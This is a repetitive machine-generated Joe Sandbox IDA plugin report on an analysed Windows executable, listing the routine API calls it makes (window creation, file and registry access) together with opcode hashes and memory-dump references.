                                                                                    • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                    • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                                    • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                    • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                                    APIs
                                                                                    • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoScroll
                                                                                    • String ID:
                                                                                    • API String ID: 629608716-0
                                                                                    • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                    • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                    • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                    • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                    APIs
                                                                                      • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                      • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                    • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                                      • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                      • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                    • String ID:
                                                                                    • API String ID: 1039859321-0
                                                                                    • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                    • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                                    • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                    • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                    • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                                    • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                    • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                                    APIs
                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                    • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                                    • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                    • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                    • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                    • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                    • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                    • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                                    • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                    • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                    • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                                    • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                    • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                                    APIs
                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                    • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                                    • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                    • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                                    APIs
                                                                                    • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AFAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExtentPointText
                                                                                    • String ID:
                                                                                    • API String ID: 566491939-0
                                                                                    • Opcode ID: 90a462693412dbe2d3701b4a638a08269245f99a520fb20ced4cfa3a60c0f726
                                                                                    • Instruction ID: 521e336bb4068398e137653e65768ba8fc8edf3c24fac2dc391ef4baa913583b
                                                                                    • Opcode Fuzzy Hash: 90a462693412dbe2d3701b4a638a08269245f99a520fb20ced4cfa3a60c0f726
                                                                                    • Instruction Fuzzy Hash: 3BE086F13096106B9201E67E1D81D9FA7DC8B4D26A714817AF858E73C2D62CDD1A43AE
                                                                                    APIs
                                                                                    • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                    • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                    • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                    • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                    APIs
                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                    • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                                    • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                    • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                                    APIs
                                                                                    • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 1863332320-0
                                                                                    • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                    • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                                    • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                    • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                    • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                    • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                    • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                    APIs
                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                    • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                    • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                    • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                    APIs
                                                                                      • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                    • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                      • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3202724764-0
                                                                                    • Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                                    • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                    • Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                                    • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                    APIs
                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                    • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                    • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                    • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                    • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                    • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                    • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
